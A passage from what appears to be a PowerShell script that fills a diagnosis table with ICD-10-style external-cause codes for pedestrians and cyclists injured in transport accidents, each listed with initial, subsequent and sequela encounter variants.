injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with car, pick-up truck or van, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian on foot injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian on foot injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian on foot injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in nontraffic accident","Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian on foot injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian on foot injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian on foot injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian on skateboard injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in traffic accident","Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with heavy transport vehicle or bus, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian on foot injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian on foot injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian on foot injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian on roller-skates injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian on roller-skates injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian on roller-skates injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian on skateboard injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian on skateboard injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian on skateboard injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian with other conveyance injured in collision with railway train or railway vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian with other conveyance injured in collision with railway train or railway vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with railway train or railway vehicle in nontraffic accident","Pedestrian with other conveyance injured in collision with railway train or railway vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with railway train or railway vehicle in traffic accident","Pedestrian on foot injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with railway train or railway vehicle in traffic accident","Pedestrian on foot injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with railway train or railway vehicle in traffic accident","Pedestrian on foot injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with railway train or railway vehicle in traffic accident","Pedestrian on roller-skates injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with railway train or railway vehicle in traffic accident","Pedestrian on roller-skates injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with railway train or railway vehicle in traffic accident","Pedestrian on roller-skates injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with railway train or railway vehicle in traffic accident","Pedestrian on skateboard injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with railway train or railway vehicle in traffic accident","Pedestrian on skateboard injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with railway train or railway vehicle in traffic accident","Pedestrian on skateboard injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with railway train or railway vehicle in traffic accident","Pedestrian with other conveyance injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with railway train or railway vehicle in traffic accident","Pedestrian with other conveyance injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with railway train or railway vehicle in traffic accident","Pedestrian with other conveyance injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with railway train or railway vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian on foot injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian on foot injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian on foot injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian on roller-skates injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian on roller-skates injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian on roller-skates injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian on skateboard injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian on skateboard injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian on skateboard injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian with other conveyance injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian with other conveyance injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with other nonmotor vehicle in nontraffic accident","Pedestrian with other conveyance injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other nonmotor vehicle in traffic accident","Pedestrian on foot injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other nonmotor vehicle in traffic accident","Pedestrian on foot injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other nonmotor vehicle in traffic accident","Pedestrian on foot injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with other nonmotor vehicle in traffic accident","Pedestrian on roller-skates injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with other nonmotor vehicle in traffic accident","Pedestrian on roller-skates injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with other nonmotor vehicle in traffic accident","Pedestrian on roller-skates injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with other nonmotor vehicle in traffic accident","Pedestrian on skateboard injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with other nonmotor vehicle in traffic accident","Pedestrian on skateboard injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with other nonmotor vehicle in traffic accident","Pedestrian on skateboard injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with other nonmotor vehicle in traffic accident","Pedestrian with other conveyance injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with other nonmotor vehicle in traffic accident","Pedestrian with other conveyance injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with other nonmotor vehicle in traffic accident","Pedestrian with other conveyance injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on foot injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on foot injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on roller-skates injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on roller-skates injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian on skateboard injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian on skateboard injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian with other conveyance injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident","Pedestrian with other conveyance injured in collision with other nonmotor vehicle, unspecified whether traffic or nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in nontraffic accident involving unspecified motor vehicles","Pedestrian injured in nontraffic accident involving unspecified motor vehicles, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in nontraffic accident involving unspecified motor vehicles","Pedestrian injured in nontraffic accident involving unspecified motor vehicles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in nontraffic accident involving unspecified motor vehicles","Pedestrian injured in nontraffic accident involving unspecified motor vehicles, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in nontraffic accident involving military vehicle","Pedestrian injured in nontraffic accident involving military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in nontraffic accident involving military vehicle","Pedestrian injured in nontraffic accident involving military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in nontraffic accident involving military vehicle","Pedestrian injured in nontraffic accident involving military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in nontraffic accident involving other motor vehicles","Pedestrian injured in nontraffic accident involving other motor vehicles, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in nontraffic accident involving other motor vehicles","Pedestrian injured in nontraffic accident involving other motor vehicles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in nontraffic accident involving other motor vehicles","Pedestrian injured in nontraffic accident involving other motor vehicles, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in unspecified nontraffic accident","Pedestrian injured in unspecified nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in unspecified nontraffic accident","Pedestrian injured in unspecified nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in unspecified nontraffic accident","Pedestrian injured in unspecified nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in traffic accident involving unspecified motor vehicles","Pedestrian injured in traffic accident involving unspecified motor vehicles, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in traffic accident involving unspecified motor vehicles","Pedestrian injured in traffic accident involving unspecified motor vehicles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in traffic accident involving unspecified motor vehicles","Pedestrian injured in traffic accident involving unspecified motor vehicles, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in traffic accident involving military vehicle","Pedestrian injured in traffic accident involving military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in traffic accident involving military vehicle","Pedestrian injured in traffic accident involving military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in traffic accident involving military vehicle","Pedestrian injured in traffic accident involving military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in traffic accident involving other motor vehicles","Pedestrian injured in traffic accident involving other motor vehicles, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in traffic accident involving other motor vehicles","Pedestrian injured in traffic accident involving other motor vehicles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in traffic accident involving other motor vehicles","Pedestrian injured in traffic accident involving other motor vehicles, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in unspecified traffic accident","Pedestrian injured in unspecified traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in unspecified traffic accident","Pedestrian injured in unspecified traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in unspecified traffic accident","Pedestrian injured in unspecified traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in unspecified transport accident","Pedestrian injured in unspecified transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in unspecified transport accident","Pedestrian injured in unspecified transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedestrian injured in unspecified transport accident","Pedestrian injured in unspecified transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with pedestrian or animal in nontraffic accident","Pedal cycle driver injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with pedestrian or animal in nontraffic accident","Pedal cycle driver injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle driver injured in collision with pedestrian or animal in nontraffic accident","Pedal cycle driver injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with pedestrian or animal in nontraffic accident","Pedal cycle passenger injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with pedestrian or animal in nontraffic accident","Pedal cycle passenger injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Pedal cycle passenger injured in collision with pedestrian or animal in nontraffic accident","Pedal cycle passenger injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with pedestrian or animal in nontraffic accident","Unspecified pedal cyclist injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified pedal cyclist injured in collision with pedestrian or animal in 